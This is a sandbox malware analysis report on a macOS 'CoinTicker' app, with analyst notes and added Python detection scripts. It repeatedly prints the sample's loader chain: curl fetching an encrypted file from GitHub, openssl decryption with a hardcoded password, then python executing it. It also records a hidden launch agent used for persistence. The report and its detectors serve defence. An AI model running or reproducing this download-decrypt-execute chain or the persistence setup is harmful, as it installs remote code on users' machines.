
Analysis Report xqnTwFKnuR

Overview

General Information

Joe Sandbox Version: 24.0.0
Analysis ID: 63329
Start date: 02.11.2018
Start time: 10:57:17
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 12m 54s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: xqnTwFKnuR (renamed file extension from none to app)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal60.troj.spyw.macAPP@0/21@10/0

Detection

Strategy: Threshold
Score: 60
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Signature Overview



Cryptography:

Decrypts dropped files with the "openssl" command
Source: /bin/sh (PID: 712) Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 724) Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 729) Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 734) Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Executes the "openssl" command used for cryptographic operations
Source: /bin/sh (PID: 712) Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 724) Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 729) Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 734) Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq

Note: the password is supplied with -k on the command line, so it is visible to any process listing and is recorded verbatim here. The four invocations correspond to the four sh -c runs of the download/decrypt/execute sequence (PIDs 709, 722, 727, 732) listed under Persistence and Installation Behavior. An analyst holding a captured copy of /tmp/.info.enc can reproduce the decryption offline with the same openssl enc arguments and inspect the resulting /tmp/.info.py instead of letting the sample execute it.

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.0.50:49239 -> 185.206.144.226:1339
Connects to IPs without corresponding DNS lookups
Source: unknown TCP traffic detected without corresponding DNS query: 185.206.144.226 (11 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 17.188.165.205 (2 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 17.252.92.75 (2 connections)
Downloads files from webservers via HTTP
Source: global traffic HTTP traffic detected: GET /MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISBEPFo0kDZ%2BqvsHbeCoThsluI HTTP/1.1
  Host: ocsp.int-x3.letsencrypt.org
  Connection: close
  User-Agent: trustd (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookups
Source: unknown DNS traffic detected: queries for: github.com
Reads from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 710) Reads from socket in process: data
Source: /usr/bin/curl (PID: 723) Reads from socket in process: data
Source: /usr/bin/curl (PID: 728) Reads from socket in process: data
Source: /usr/bin/curl (PID: 733) Reads from socket in process: data
Uses HTTPS
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49250 -> 443
Writes from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 710) Writes from socket in process: data
Source: /usr/bin/curl (PID: 723) Writes from socket in process: data
Source: /usr/bin/curl (PID: 728) Writes from socket in process: data
Source: /usr/bin/curl (PID: 733) Writes from socket in process: data

Note: the only connection in this section not explained by OS background activity or by the curl downloads is 192.168.0.50:49239 -> 185.206.144.226:1339. The 17.0.0.0/8 addresses belong to Apple, and the plain-HTTP request is an OCSP status check issued by macOS trustd (see its User-Agent) during certificate validation, which is normal during a TLS handshake. The github.com lookup corresponds to the curl downloads listed under Persistence and Installation Behavior.
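Two of the signatures above, "Connects to IPs without corresponding DNS lookups" and "Detected TCP or UDP traffic on non-standard ports", are straightforward to reproduce from a connection log. The following Python is an added example, not part of the Joe Sandbox report or the sample: it walks DNS answers and TCP flows in order, flags a flow whose destination was never returned by an earlier DNS answer or whose port is outside a small standard set, and downgrades hits inside Apple's 17.0.0.0/8, where the report's own 17.x hits fall. The event list is constructed to mirror this section; the address returned for github.com is a documentation-range placeholder, not a real resolution.

```python
"""Flag TCP flows with no preceding DNS answer and flows on non-standard ports.
Added example, not part of the sandbox report."""
import ipaddress

# Ports a workstation ordinarily talks to; everything else counts as non-standard.
STANDARD_PORTS = {22, 25, 53, 80, 123, 143, 443, 465, 587, 993, 995}

# 17.0.0.0/8 is Apple-owned. macOS services (OCSP checks by trustd, push, updates)
# reach it without a DNS query visible in a short capture, so hits are downgraded.
OS_BACKGROUND_RANGES = [ipaddress.ip_network("17.0.0.0/8")]

# Constructed event stream modeled on the report's traffic section. 203.0.113.10
# is a documentation-range placeholder, not what github.com resolves to.
EVENTS = [
    {"type": "dns", "qname": "github.com", "answers": ["203.0.113.10"]},
    {"type": "tcp", "src": "192.168.0.50", "sport": 49240, "dst": "203.0.113.10", "dport": 443},
    {"type": "tcp", "src": "192.168.0.50", "sport": 49239, "dst": "185.206.144.226", "dport": 1339},
    {"type": "tcp", "src": "192.168.0.50", "sport": 49245, "dst": "17.252.92.75", "dport": 443},
    {"type": "tcp", "src": "192.168.0.50", "sport": 49252, "dst": "185.206.144.226", "dport": 1339},
]


def analyze(events):
    """Walk events in order. A TCP flow is 'no_dns' if no earlier DNS answer carried
    its destination address and 'nonstandard_port' if the destination port is outside
    STANDARD_PORTS. Returns one finding per suspicious flow."""
    resolved = {}      # ip -> set of names it was answered for
    findings = []
    for ev in events:
        if ev["type"] == "dns":
            for ip in ev["answers"]:
                resolved.setdefault(ip, set()).add(ev["qname"])
            continue
        dst, dport = ev["dst"], ev["dport"]
        reasons = []
        if dst not in resolved:
            reasons.append("no_dns")
        if dport not in STANDARD_PORTS:
            reasons.append("nonstandard_port")
        if not reasons:
            continue
        addr = ipaddress.ip_address(dst)
        background = any(addr in net for net in OS_BACKGROUND_RANGES)
        if background:
            severity = "low"
        elif len(reasons) == 2:
            severity = "high"
        else:
            severity = "medium"
        findings.append({
            "src": f"{ev['src']}:{ev['sport']}",
            "dst": f"{dst}:{dport}",
            "reasons": reasons,
            "severity": severity,
            "names": sorted(resolved.get(dst, ())),
        })
    return findings


def summarize(findings):
    """Collapse per-flow findings into one line per destination with a count,
    the way the report lists repeated hits against 185.206.144.226."""
    counts = {}
    for f in findings:
        key = (f["dst"], f["severity"], tuple(f["reasons"]))
        counts[key] = counts.get(key, 0) + 1
    return [f"{dst} {severity} {','.join(reasons)} x{n}"
            for (dst, severity, reasons), n in sorted(counts.items())]


if __name__ == "__main__":
    for line in summarize(analyze(EVENTS)):
        print(line)
```

The ordering matters: a DNS answer that arrives after the connection does not explain it, which is why the resolver map is built as the stream is walked rather than up front. Feeding the function a real capture means emitting one dns event per answer record and one tcp event per SYN.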

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk
Source: /usr/bin/curl (PID: 710) HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 723) HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 728) HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 733) HTML file containing JavaScript created: /private/tmp/.info.enc

Note: this signature classifies the downloaded /private/tmp/.info.enc as HTML with embedded JavaScript. AES-256-CBC ciphertext, which is what the openssl stage expects, would not classify that way, so the result is consistent with the GitHub URL having returned an HTML page (for example an error page) at analysis time rather than the encrypted payload. If so, the openssl and python stages that follow operated on that page, and the report's trojan/spyware scoring rests on the loader behaviour rather than on a second-stage payload. The report does not show the stdout of those stages, so treat this as an inference.

System Summary:

Classification label
Source: classification engine Classification label: mal60.troj.spyw.macAPP@0/21@10/0

Persistence and Installation Behavior:

Explicitly loads/starts launch services based on hidden plist files
Source: /bin/bash (PID: 708) Hidden launch agent/daemon loaded: launchctl load /Users/henry/Library/LaunchAgents/.espl.plist
Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
Source: /bin/sh (PID: 701) Shell process: /sbin/ifconfig
Source: /bin/sh (PID: 710) Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 712) Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 713) Shell process: python /tmp/.info.py
Source: /bin/sh (PID: 723) Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 724) Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 725) Shell process: python /tmp/.info.py
Source: /bin/sh (PID: 728) Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 729) Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 730) Shell process: python /tmp/.info.py
Source: /bin/sh (PID: 733) Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 734) Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
Source: /bin/sh (PID: 735) Shell process: python /tmp/.info.py
Creates hidden files, links and/or directories
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Hidden file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plist
Source: /usr/bin/curl (PID: 710) Hidden file created: /tmp/.info.enc
Source: /usr/bin/openssl (PID: 712) Hidden file created: /tmp/.info.py
Creates launch services that start periodically
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plist
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c echo […]
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c sleep 1 launchctl unload /Users/henry/Library/LaunchAgents/.espl.plist launchctl load /Users/henry/Library/LaunchAgents/.espl.plist
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c launchctl list | grep 'espl'
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c sw_vers
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c test -e /tmp/.info.py && echo 'Yes' || echo 'No'
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c test -e /tmp/.server.sh && echo 'Yes' || echo 'No'
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Shell command executed: /bin/bash -c test -e /Users/henry/Library/LaunchAgents/.espl.plist && echo 'Yes' || echo 'No'
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699) Shell command executed: sh -c LC_ALL=C /sbin/ifconfig 2>/dev/null
Source: /usr/bin/sh (PID: 709) Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py
Source: /usr/bin/sh (PID: 722) Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py
Source: /usr/bin/sh (PID: 727) Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py
Source: /usr/bin/sh (PID: 732) Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py

Note: the sh -c lines above show the curl, openssl and python commands run together; the separators between them are not preserved in this rendering, but the per-PID "Shell process" lines confirm they execute as three separate commands in sequence. The first bash -c line (echo piped through base64 --decode into python, per the base64 and python entries below) has its argument elided in this rendering. curl is run with -k, which disables TLS certificate verification, and -L, which follows redirects.

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /usr/bin/nohup (PID: 710) Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /usr/bin/nohup (PID: 723) Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /usr/bin/nohup (PID: 728) Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /usr/bin/nohup (PID: 733) Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/bash (PID: 716) Grep executable: /usr/bin/grep -> grep espl
Executes the "nohup" (no hangup) command used to keep a background process from being killed when its terminal closes
Source: /bin/sh (PID: 710) Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 723) Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 728) Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Source: /bin/sh (PID: 733) Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
Executes the "python" command used to interpret Python scripts
Source: /bin/bash (PID: 699) Python executable: /Library/Frameworks/Python.framework/Versions/2.7/bin/python -> python
Source: /bin/sh (PID: 713) Python executable: /usr/bin/python -> python /tmp/.info.py
Source: /bin/sh (PID: 725) Python executable: /usr/bin/python -> python /tmp/.info.py
Source: /bin/sh (PID: 730) Python executable: /usr/bin/python -> python /tmp/.info.py
Source: /bin/sh (PID: 735) Python executable: /usr/bin/python -> python /tmp/.info.py
Explicitly lists launch services possibly for searching
Source: /bin/bash (PID: 715) Launch agent/daemon listed: launchctl list
Explicitly loads/starts launch services
Source: /bin/bash (PID: 708) Launch agent/daemon loaded: launchctl load /Users/henry/Library/LaunchAgents/.espl.plist
Explicitly unloads, stops, and/or removes launch services
Source: /bin/bash (PID: 707) Launch agent/daemon unloaded: launchctl unload /Users/henry/Library/LaunchAgents/.espl.plist
Keeps child processes alive after launchd jobs die
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Launch agent/daemon created with AbandonProcessGroup, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plist
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
App bundle is code signed
Source: Submitted file: xqnTwFKnuR.app CodeResources XML file: CodeResources
Note: the presence of a CodeResources file only shows that the bundle carries a signature; the report does not state whether the signature validates or who the signer is.
Reads data from the local random generator
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Random device file read: /dev/urandom
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699) Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python framework
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 699) Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/python (PID: 713) Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/python (PID: 725) Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/python (PID: 730) Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/python (PID: 735) Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) XML plist file created: /Users/henry/Documents/coins.plist
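The loader sequence recorded in this section (curl with certificate checking disabled into a hidden /tmp file, openssl enc -d with the password in argv, then python on the decrypted hidden script, all reloaded through a dotfile plist) is detectable from process-execution records alone. The following Python is an added example, not part of the report: it parses records written in the same "<parent> (PID: n) Shell process: <command>" form the report uses, tags each risky invocation, and links the three stages by the file names they share. The log lines are constructed from this section plus two benign controls; the /private/tmp to /tmp normalization reflects the macOS symlink, which is why the report lists the same file under both names.

```python
"""Detect the download -> decrypt -> execute loader chain from process records.
Added example; the log lines are constructed in the report's own
'<parent> (PID: n) Shell process: <cmd>' style and are not sandbox output."""
import posixpath
import re
import shlex

LINE_RE = re.compile(r"^(?P<parent>\S+) \(PID: (?P<pid>\d+)\) Shell process: (?P<cmd>.+)$")

# Constructed records modeled on the report; the last two are benign controls.
LOG = """\
/bin/sh (PID: 710) Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc
/bin/sh (PID: 712) Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq
/bin/sh (PID: 713) Shell process: python /tmp/.info.py
/bin/bash (PID: 708) Shell process: launchctl load /Users/henry/Library/LaunchAgents/.espl.plist
/bin/bash (PID: 718) Shell process: sw_vers
/bin/bash (PID: 900) Shell process: curl -o /Users/henry/Downloads/report.pdf https://example.org/report.pdf
"""


def normalize(path):
    """/tmp is a symlink to /private/tmp on macOS; treat both spellings as one path."""
    return path[len("/private"):] if path.startswith("/private/") else path


def is_hidden(path):
    return posixpath.basename(path).startswith(".")


def opt_value(argv, *flags):
    """Return the argument following the first of *flags present, else None."""
    for i, a in enumerate(argv[:-1]):
        if a in flags:
            return argv[i + 1]
    return None


def parse(log):
    records = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        argv = shlex.split(m["cmd"])
        # nohup only detaches from the terminal; the real program is the next word.
        if argv and argv[0] == "nohup":
            argv = argv[1:]
        records.append({"pid": m["pid"], "parent": m["parent"], "argv": argv})
    return records


def scan(log):
    """Return per-process hits plus any curl->openssl->python chain whose files line up."""
    hits, curl_out, enc_out, scripts = [], set(), {}, set()
    for r in parse(log):
        argv = r["argv"]
        if not argv:
            continue
        prog = posixpath.basename(argv[0])
        if prog == "curl":
            out = opt_value(argv, "-o", "--output")
            if "-k" in argv or "--insecure" in argv:
                hits.append({"pid": r["pid"], "tag": "curl_insecure", "detail": "TLS verification disabled"})
            if out and is_hidden(out):
                out = normalize(out)
                curl_out.add(out)
                hits.append({"pid": r["pid"], "tag": "curl_hidden_output", "detail": out})
        elif prog == "openssl" and "enc" in argv and "-d" in argv:
            # For openssl, -k is the password; for curl it means insecure. argv[0] decides.
            secret = opt_value(argv, "-k", "-pass")
            if secret:
                hits.append({"pid": r["pid"], "tag": "openssl_cli_password", "detail": secret})
            src, dst = opt_value(argv, "-in"), opt_value(argv, "-out")
            if src and dst:
                enc_out[normalize(src)] = normalize(dst)
        elif prog in ("python", "python2", "python3") and len(argv) > 1 and is_hidden(argv[1]):
            scripts.add(normalize(argv[1]))
            hits.append({"pid": r["pid"], "tag": "python_hidden_script", "detail": normalize(argv[1])})
        elif prog == "launchctl" and len(argv) > 2 and argv[1] in ("load", "bootstrap") and is_hidden(argv[-1]):
            hits.append({"pid": r["pid"], "tag": "launchctl_hidden_plist", "detail": argv[-1]})
    # Chain: the file curl wrote is what openssl decrypted, and openssl's output is what python ran.
    chains = sorted((src, enc_out[src]) for src in curl_out
                    if src in enc_out and enc_out[src] in scripts)
    return {"hits": hits, "chains": chains}


if __name__ == "__main__":
    result = scan(LOG)
    for h in result["hits"]:
        print(h["pid"], h["tag"], h["detail"])
    print("chains:", result["chains"])
```

Each tag on its own is noisy (developers run curl -k and openssl enc too); the chain, where the output of one stage is the input of the next and every file is a dotfile under /tmp, is the high-confidence signal. The same correlation works on EDR process telemetry once the records are mapped to the pid/argv shape parse() produces.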

Boot Survival:

Creates memory-persistent launch services
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Launch agent created, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plist
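The Boot Survival and periodic-start signatures all derive from keys inside the hidden plist .espl.plist (RunAtLoad and/or KeepAlive, StartInterval and/or StartCalendarInterval, AbandonProcessGroup). The following Python is an added example, not the sample's plist or the report's logic: it audits every plist in a LaunchAgents directory for those keys, for a shell wrapper that invokes download or decryption tools, and for hidden /tmp paths, then ranks the results. The two plists it writes are constructed. The label com.example.espl, the semicolon separators, the 60-second interval and the specific choice of RunAtLoad plus StartInterval are assumptions, since the report only states which key families were present.

```python
"""Audit a LaunchAgents directory for the traits the report attributes to
.espl.plist. Added example; the plists are constructed here, not the sample's."""
import os
import plistlib
import re
import tempfile

# Weight per launchd key: KeepAlive/RunAtLoad restart or start at login, the
# Start*Interval keys re-run the job periodically, AbandonProcessGroup keeps
# children alive after launchd stops the job.
KEY_WEIGHTS = {"RunAtLoad": 1, "KeepAlive": 1, "StartInterval": 1,
               "StartCalendarInterval": 1, "AbandonProcessGroup": 2}
SHELLS = {"sh", "bash", "zsh"}
LOADER_TOOLS = re.compile(r"\b(curl|wget|openssl|python|base64|nohup)\b")
HIDDEN_TMP = re.compile(r"/(?:private/)?tmp/\.")


def audit_plist(path):
    with open(path, "rb") as fh:
        plist = plistlib.load(fh)
    score, findings = 0, []
    if os.path.basename(path).startswith("."):
        score += 3
        findings.append("hidden filename")
    for key, weight in KEY_WEIGHTS.items():
        if plist.get(key):
            score += weight
            findings.append(f"{key}={plist[key]!r}")
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    args = [str(a) for a in args]
    if args and os.path.basename(args[0]) in SHELLS:
        score += 1
        findings.append("program is a shell wrapper")
    joined = " ".join(args)
    tools = sorted(set(LOADER_TOOLS.findall(joined)))
    if tools:
        score += 2 * len(tools)
        findings.append("invokes " + ", ".join(tools))
    if HIDDEN_TMP.search(joined):
        score += 2
        findings.append("uses hidden files under /tmp")
    return {"path": path, "label": plist.get("Label"), "score": score, "findings": findings}


def audit_launch_agents(directory):
    """os.listdir returns dotfiles, unlike a bare `ls`, so hidden plists are included."""
    results = [audit_plist(os.path.join(directory, name))
               for name in sorted(os.listdir(directory)) if name.endswith(".plist")]
    return sorted(results, key=lambda r: -r["score"])


def build_sample_dir():
    """Write two constructed plists to a temp dir: one modeled on the report's
    .espl.plist (label, separators and exact key choices are assumptions) and one
    benign updater job."""
    d = tempfile.mkdtemp()
    suspicious = {
        "Label": "com.example.espl",   # assumed; the report only shows grep 'espl'
        "ProgramArguments": ["/bin/sh", "-c",
            "nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; "
            "openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; "
            "python /tmp/.info.py"],
        "RunAtLoad": True,
        "StartInterval": 60,           # assumed interval
        "AbandonProcessGroup": True,
    }
    benign = {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
        "StartInterval": 86400,
    }
    with open(os.path.join(d, ".espl.plist"), "wb") as fh:
        plistlib.dump(suspicious, fh)
    with open(os.path.join(d, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump(benign, fh)
    return d


if __name__ == "__main__":
    for r in audit_launch_agents(build_sample_dir()):
        print(r["score"], r["path"], r["label"], "; ".join(r["findings"]))
```

On a live machine call audit_launch_agents(os.path.expanduser("~/Library/LaunchAgents")) and repeat for /Library/LaunchAgents and /Library/LaunchDaemons. A confirmed hit is removed with launchctl unload on the plist followed by deleting the file, which mirrors the unload the sample itself performs before it reloads the job; a periodic job should also be checked for children already running, since AbandonProcessGroup lets them outlive the job.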

Hooking and other Techniques for Hiding and Protection:

Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Source: /bin/bash (PID: 698) Base64 executable: /usr/bin/base64 -> base64 --decode

Malware Analysis System Evasion:

Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/bash (PID: 706) Sleep executable: /bin/sleep -> sleep 1

Note: this is the one-second pause between launchctl unload and launchctl load of .espl.plist shown under Persistence and Installation Behavior; a single sleep 1 is a sequencing delay, not a sandbox-evasion timeout.

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

Queries OS software version with shell command 'sw_vers'
Source: /bin/bash (PID: 718) sw_vers executed: sw_vers
Reads hardware related sysctl values
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Sysctl read request: hw.availcpu (6.25)
Reads the system's OS release and/or type
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Sysctl requested: kern.ostype (1.1)
